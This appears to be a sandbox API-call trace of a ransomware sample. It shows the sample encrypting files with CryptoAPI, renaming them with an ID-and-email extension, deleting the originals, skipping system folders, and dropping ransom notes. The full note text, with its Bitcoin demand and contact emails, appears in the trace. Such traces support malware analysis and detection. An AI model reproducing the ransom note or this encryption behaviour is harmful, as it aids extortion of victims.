	[0172.630] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.630] CryptDeriveKey (in: hProv=0xfcb440, Algid=0x6610, hBaseData=0xfb91b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb95b0) returned 1
	[0172.630] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.631] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0172.631] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.631] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0172.631] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.631] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0172.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.632] CryptDestroyKey (hKey=0xfb95b0) returned 1
	[0172.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.632] CryptDestroyHash (hHash=0xfb91b0) returned 1
	[0172.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.632] CryptReleaseContext (hProv=0xfcb440, dwFlags=0x0) returned 1
	[0172.633] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.633] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.633] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.633] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0172.637] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0172.638] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.638] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0172.641] CloseHandle (hObject=0x39c) returned 1
	[0172.641] CloseHandle (hObject=0x390) returned 1
	[0172.641] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml")) returned 1
	[0172.645] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml")) returned 0
	[0172.645] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0172.645] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0172.645] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0172.645] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0172.646] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}"
	[0172.646] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*"
	[0172.646] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.646] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.646] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0172.646] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0172.647] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0172.647] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0172.658] CloseHandle (hObject=0x388) returned 1
	[0172.659] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.660] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.660] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0172.661] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0172.661] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0172.661] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0172.661] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0172.662] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0172.662] CloseHandle (hObject=0x388) returned 1
	[0172.662] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.663] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.663] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0172.663] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0172.663] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0172.663] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0172.664] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0172.668] CloseHandle (hObject=0x388) returned 1
	[0172.669] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.669] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.670] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0172.671] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.671] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0172.671] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0172.671] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.672] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0172.672] CloseHandle (hObject=0x388) returned 1
	[0172.672] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x806ebbce, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80711df5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0172.673] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*") returned 84
	[0172.673] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.673] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*") returned 0x54
	[0172.673] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.673] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="windows") returned 0x0
	[0172.673] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.674] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="boot") returned 0x0
	[0172.674] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.674] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="system volume information") returned 0x0
	[0172.674] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.674] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.674] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.674] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="temp") returned 0x0
	[0172.674] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.675] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="program files") returned 0x0
	[0172.675] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.675] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.675] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.675] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="appdata") returned 0x0
	[0172.675] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.675] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="application data") returned 0x0
	[0172.676] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.676] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="winnt") returned 0x0
	[0172.676] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.676] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="tmp") returned 0x0
	[0172.676] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.676] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="cache") returned 0x0
	[0172.676] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.676] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.677] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.677] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="webcache") returned 0x0
	[0172.677] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.677] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="inetcache") returned 0x0
	[0172.677] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.677] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="nvidia") returned 0x0
	[0172.677] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.678] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="packages") returned 0x0
	[0172.678] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.678] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="cookies") returned 0x0
	[0172.678] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.678] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="programdata") returned 0x0
	[0172.678] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0172.678] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0172.678] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x806ebbce, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80711df5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0172.679] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0172.679] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8069f32b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8069f32b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8069f32b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1990, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0172.679] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80711df5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80711df5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80737e91, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0172.679] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x806ebbce, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x806ebbce, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80711df5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0172.679] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x806ebbce, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x806ebbce, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x806ebbce, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0172.679] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0172.679] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0172.679] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0172.679] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}"
	[0172.680] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\"
	[0172.680] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov"
